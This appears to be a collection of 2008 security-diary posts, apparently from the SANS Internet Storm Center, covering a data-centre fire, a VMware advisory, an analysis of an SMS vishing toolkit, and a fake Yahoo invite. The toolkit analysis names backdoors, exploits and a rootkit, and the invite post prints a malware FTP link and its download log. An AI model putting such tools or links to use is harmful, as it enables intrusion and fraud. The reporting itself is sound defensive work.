This bulletin was revised to add Windows XP Service Pack 3 as affected software.
This is a detection update only. There were no changes to the binaries, since
the same update for Windows XP Service Pack 2 and Windows XP Professional x64
Edition applies to Windows XP Service Pack 3. Customers with Windows XP Service
Pack 2 and Windows XP Professional x64 Edition who have already installed the security
update will not need to reinstall the update. Customers with Windows XP Service Pack 3
should apply the update immediately."



Published: 2008-06-02

Emergingthreats.net and ThePlanet

You know what they say about the best laid plans...  Several of our readers have written in today saying they couldn't reach emergingthreats.net.  I just talked to Matt Jonkman and he tells me that they expect to be live again shortly (maybe even by the time  you read this).  It turns out they have 2 servers that used to be in 2 different datacenters until ThePlanet bought ev1 and moved their other server into that same datacenter in Houston where their first server was located.  You know, the one that had the big fire (see http://isc.sans.org/diary.html?storyid=4504).


Published: 2008-06-02

sms-vishing for your bank info

I have recently become aware of and involved in researching sms vishing attacks. As part of that research I came across an automated toolkit that appears to have been cobbled together for sms spamming and vishing (phishing using voice networks instead of data networks). The name of the main tool was SmssmtpSender.

SmssmtpSender consisted of several individual tools cobbled together to create a single toolkit to compromise, manage and control a set of systems for sending SMS spam via compromised popaccounts that had weak passwords. Here is a "short" analysis of the elements of that tool kit.


File type description
Top_level_dir< directory
/greetingisland.gsm data Greeting Message used to vish customers this version was for North Island Credit Union.
Contents of welcome message;<

“Welcome to North Island Credit Union Financial department. Please follow the next steps to renew your payments and transfer services”
/hello.wav RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz

Greeting Message used to vish customers for North Island Credit Union.

Contents of welcome message;

“Welcome to North Island Credit Union Financial department. Please follow the next steps to renew your payments and transfer services”

/horde directory Top level directory for horde remote compromise tool.
/horde/.dc perl script text “Data Cha0s Connect Back Backdoor” This could be used as a backdoor control channel however in the systems analyzed ssh on a high numbered ports was used for management instead.

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), for GNU/Linux 2.2.5, stripped.


From the man page "gwee  (generic web exploitation engine) is a small program written in C designed to exploit arbitrary command  execution  vulnerabilities  in  web scripts, such as Perl, CGIs, PHP, etc. gwee is much like an exploit, except  more  general purpose."

This appears to have been tested for remote web based shell access using .dc above. The systems that I am aware of were compromised via the horde.pl script not gwee with .dc.

/horde/gwee-1.36 directory Top Level directory for gwee.
/horde/gwee-1.36/binaries directory Directory for binaries created in the compile of gwee.
/horde/gwee-1.36/binaries/gwee.exe PE executable for MS Windows (console) Intel 80386 32-bit gwee executable for windows.
/horde/gwee-1.36/gwee ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), for GNU/Linux 2.2.5,; stripped gwee executable for linux on intel >= 2.2.5
 /horde/gwee-1.36/gwee.1 troff or preprocessor input text man page for gwee
 /horde/gwee-1.36/gwee.c ASCII C program text, with very long lines gwee source code
 /horde/gwee-1.36/Makefile ASCII text gwee makefile
 /horde/gwee-1.36/mktarball.sh Bourne shell script text executable script to create a tarball for gwee
 /horde/gwee-1.36/README ASCII English text Installation notes for gwee
 /horde/gwee-1.36.tar.gz gzip compressed data, from Unix gzipped tar ball of gwee
 /horde/horddy.pl perl script text executable Horde help module remote execution perl exploit. This was used to compromise horde hosts to use as the smtp -> sms  senders.
 /horde/root.txt Bourne shell script text executable

“ PRCTL local root exp By Sunix effected systems 2.6.13<= x <= + 2.6.9-22.Elsmp”

A local privilege escalation root exploit for LINUX kernals 2.6.13-2.6.17. The horde.pl exploit often would not provide direct root access so a privilege  escalation tool was included in this tool kit.

 /horde/try Bourne shell script text executable script with gwee parameters used to exploit remote systems. It appears to use .dc for a remote shell.
 /horde/try.bak Bourne shell script text executable Script with gwee parameters used to exploit remote systems. It appears to use .dc for a remote shell. Appears to be used after horddy.pl to check for success of the remote exploit to see if the backdoor port was opened.
 /hordetry.tgz gzip compressed data, from Unix gzipped tar ball of the horde tool.
 /netstatx.c ASCII C program text, with escape sequences  “ps.c,v 1.11 2001/09/03” trojaned ps replacement style root kit. Wraps ps filtering the output via egrep –v for the set of hidden words. Any word in the hidden word set is removed from the ps output. Effectively hiding any process in the “Hidden Word” set on a compromised system. Hidden words are stored in /usr/lib/.lib/libps or libph.
 /popprober directory Top level directory for popprober tool.
 /popprober/checked.txt ASCII text File with accounts that have been tested.
 /popprober/copy.txt ASCII text List of accounts with status such as “Unread”. Appears to be a list of active but unused accounts. These are post processed via probe.pl.
 /popprober/message.txt ASCII text Probe.pl looks for this message to validate the account is still unused.
 /popprober/popvuln.txt ASCII text List of vulnerable pop accouts with account, password, ip address of pop/smtp server and type of login {LOGIN|CRAM-MD5}
 /popprober/probe.pl perl script text executable Tool used to post process copy text for unread/unmonitored accounts.
 /popprober/smtp-client.pl perl script text executable Simple SMTP client with STARTTLS and AUTH support. Tool used to send the smpt commands.
 /popprober/Test.pl perl script text executable  “Meca smtp Test v1.0” Wrapper for smtp-client.pl to send to accounts listed in popvuln.txt.
 /smssmtpsender directory  The sms smtp sending tools main directory.
/smssmtpsender/message.txt ASCII text Spam text to be sent via smtp to an smtp->sms gateway. This is the actual messege being sent to sms enabled devices.
/smssmtpsender/poplist.txt ASCII text List of accounts to use when sending smtp messeges. Same format as popvuln.txt.
 /smssmtpsender/send.pl perl script text executable “Meca smtp sender v1.0”. Used to send smtp SPAM messeges.
 /smssmtpsender/smtp-engine.pl perl script text executable Another perl script that can be used to send the smpt commands + spam messeges. This one spoofs Outlook by using a Xmailer variable of Microsoft Outlook Express 6.00.2600.0000
/smssmtpsender.tgz gzip compressed data, from Unix Gzipped tar ball of smssmtpsender tool kit.



Published: 2008-06-01

The Planet outage - what can we all learn from it?

The planet, a popular hosting provider, had earlier this weekend a fire and explosion resulting in an outage of their H1 data center.

Reading through the announcements and the usual techno-press reports on it, a few things struck me. While the last word isn't -by far- said about this, I saw a few striking things in the light of a BCP/DRP viewpoint:

  • First I'd like to mention that I'm actually impressed by the frequent communication and the calmness of those messages from The Planet: http://forums.theplanet.com/index.php?showtopic=90185.
    I think it's important to teach those dealing with (major) incidents to remain calm. Not just when dealing with the public or the press, but also internally. Think through your decisions, before you act, as doing things in a panic will result in making the wrong choices.
    Also communicating the right way can be critical, planning ahead helps a lot.
  • Next I saw they were "requiring us to take down all generators as instructed by the fire department". I had seen plans for BCP/DRP derail before due to officials stepping in and doing their response to an emergency in their way and not in the way the organization itself had planned it.
    I think it would be interesting for most of us to actually talk to fire departments and/or police officers on what their normal responses are and take them into account in our plans. When you build a BCP you basically try to build (and spend money) on making sure you don't loose a site. One of those things you foresee is redundant power, but if you're not going to be allowed to use it, ... perhaps your priorities would shift to doing other things with your money and to fix it on another layer ?
  • The reason they went down seems to have been: "electrical gear shorted, creating an explosion and fire that knocked down three walls surrounding our electrical equipment room". While it doesn't say as much, knocking down 3 walls is violent. Now an explosion can do that, and transformers indeed can explode, but there's another thing that can knock down walls: violently expanding gases from fire suppression systems, that's why you have those automatic vents in the walls. Please note: I'm not saying I know what happened, I don't know it. But there's one thing I'd do as a precaution: I'd like make sure that my facilities processes includes some regular check to see if those vents are still OK somehow. Knocking over walls is just too much of a scary idea.
  • The Planet got vendors involved during the weekend itself: "As you know, we have vendors onsite at the H1 data center. With their help, we’ve created a list of equipment that will be required, and we’re already dealing with those manufacturers to find the gear. Since it’s Saturday night, we do have a few challenges".
    What have you foreseen to have within hours of a fire/explosion vendors helping you to assess what equipment you need to get back on-line. Can you even reach them during a weekend ? Every bit of time you put in collecting and updating this information up-front in your BCP/DRP will pay back many times in getting back on-line.
  • It's good to see they made a list of priorities public.
    Your plans could include such lists pre-made. It's easier to cross off items you still have than to think up the list yourself during the emergency.
  • There is talk form both The Planet and some of their customers about DNS and redundancy. I'm pretty sure it's not entirely the Planet's fault, customers putting all their eggs in one basket exist all too often.
    Still, I find this strange: DNS in my opinion is about the most redundant system you can get. You can easily add another server anywhere in the world, there is hardly any penalty for having them not all of them in the same spot. So why would you even consider having them in the same spot ? Yet I've more than once seen such setups where all the NS records entered in a TLD are on adjacent IP addresses, and when doing a traceroute they actually route exactly the same. This isn't using DNS to what it can do for you, it'll protect from a server outage, but not much more than that, while if you had a handful DNS servers out there, you'd be next to impossible to get off the air DNS wise.
  • The Planet is slowly getting back in the air, so that's good.
    I think it would be a good idea for a next  BCP/DRP exercise to replay an existing incident and measure how you do against how they did in real life.
  • Lastly The Planet seems to be suffering from a /. effect on their forum. I think this is about the worst moment to get on slashdot you can imagine. But it's a likely result of the incident that those things you still have will attract more visitors than ever before.
    Again something to plan for ... although -we here at the ISC had to have a few /. features before we nailed it ourselves as well-.
    Basically make sure to have your emergency communication as solid as you can, as static as possible, and as lightweight on the server(s) as you can imagine. The last you want to do during an emergency is to have to survive a DDoS from curious people -like we all are ourselves-.

My best wishes to the folks at The Planet and glad to read nobody got hurt.

To the thousands of customers affected, well there's the SLA, but there's also some pretty decent work in recovering going on. And I can only hope those companies where I host servers would be able to do equally well and be as open about it as these folks have been so far. 

Swa Frantzen -- Gorilla Security


Published: 2008-06-01

Updates to VMware resolve critical security issues

I don't know how many of you work with VMware, but I have to thank Ed Skoudis for turning me on to virtualization in one of his classes long ago.  Since that time, I have been using it as an invaluable tool for incident handling and testing patches and vulnerabilities.  So, I found it interesting to see the VMware security advisory VMSA-2008-0008 sent from fellow handler Jim Clausing.  Security Focus is reporting that there are no exploits in the wild at this time.  These security vulnerabilities have been addressed in the newest releases of VMware's hosted product line.  The advisory affects the following products:

VMware Workstation 6.0.3 and earlier
VMware Player 2.0.3 and earlier
VMware ACE 2.0.3 and earlier
VMware Fusion 1.1.1 and earlier

Windows based VMCI arbitrary code execution vulnerability

VMware says that VMCI was introduced in VMware Workstation 6.0, VMware Player 2.0, and VMware ACE 2.0 and It is an experimental, optional feature that allows virtual machines to communicate with one another.  With VMCI enabled a guest may execute arbitrary code in the context of the vmx process on the host.   This is a compiler dependent vulnerability and only affects systems running on windows hosts.  An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.  Successfully exploiting this issue can completely compromise affected computers.  Failed exploit attempts will result in a denial-of-service condition.

VMware Host Guest File System (HGFS) shared folders

Secondly, this feature allows users to transfer data between a guest operating system and the non-virtualized host operating system that contains it.  The vulnerability is a heap buffer overflow.  Exploitation of this flaw might allow an unprivileged guest process to execute code in the context of the vmx process on the host.  In order to exploit this vulnerability, the VMware system must have at least 1 folder shared.  One good thing about this vulnerability is that if you are using the default setting,  you are not vulnerable.  The vulnerability only applies if you have changed the settings to share folders. VMware Server, ESX and ESXi do not provide the shared folders feature so they are not vulnerable.

Fair Winds,
Mari Nichols


Published: 2008-06-01

Free Yahoo email account! Sign me up, Ok well maybe not.

Hello , !
Your friend invited you to use the BETA email Service from YAHOO join YAHOO and Create your Free Email Account

Just click here to receive your FREE YAHOO EMAIL Account!

Ok so it is just a small variation on the greeting card theme (although they haven’t bothered to change the file being downloaded).    The main difference is the message, and rather than using HTTP to deliver the file the link is an FTP link along these lines ftp://username:emanresu@82.bbb.ccc.ddd/private/postcard.pif

Connecting to 82 .bbb.ccc.ddd:21... connected.
Logging in as username ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD /private ... done.
==> PASV ... done.    ==> RETR postcard.pif ...

Corporates typically block outbound FTP so most of you should be OK at work.  Home users however may end up with a little surprise.   The file downloaded should be reasonably well detected by most AV products.  The few sites I checked already had the file pulled (or not yet placed there).  

It is a fairly trivial thing.  The only reason I mention it is because, like no doubt a fair number of you, I looked at it and went “mmm, interesting that Yahoo is going down the invite path, just like google” and I opened the message to have a look.  So the message is reasonably effective at first glance. 

From a broader perspective, there seems to be no lack of FTP servers connected to the internet that have been or are being compromised.   If you run an internet facing FTP server, when was the last time you checked the logs and the users defined?

Mark H - Shearwater